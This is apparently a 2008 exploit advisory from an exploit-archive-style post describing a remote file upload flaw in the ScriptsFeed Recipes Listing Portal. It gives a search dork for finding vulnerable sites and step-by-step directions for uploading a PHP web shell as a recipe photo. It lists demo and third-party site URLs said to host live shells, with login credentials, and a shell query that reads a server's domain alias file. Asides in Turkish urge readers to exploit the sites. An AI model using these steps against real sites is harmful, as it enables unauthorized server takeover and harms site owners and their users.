[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 13.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] my bug number now: 39 [~] [~] my target bug number: 100 [~] [~] dork: allinurl:"recipedetail.php?id=" ( Ãok site var sömürün : ) ) [~] [~] ----------------------------------------------------------- Exploit: http://localhost/script/pictures/[id]your_shell.php you register to site register: http://localhost/script/register.php after you login to site login: http://localhost/script/login.php more after you click to "Add a Recipe" and add recipe and after click to "View your Recipes" click to you recipe open new page right click to your photo. select properties copy photo lick and paste your explorer go your shell your_shell.php path: http://localhost/script/pictures/[id]your_shell.php rfu for demo: user: zorlu passwd: zorlu1 shell path: http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php example 2: user: zorlu passwd: zorlu1 shell: http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI ) misal: http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler ) [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------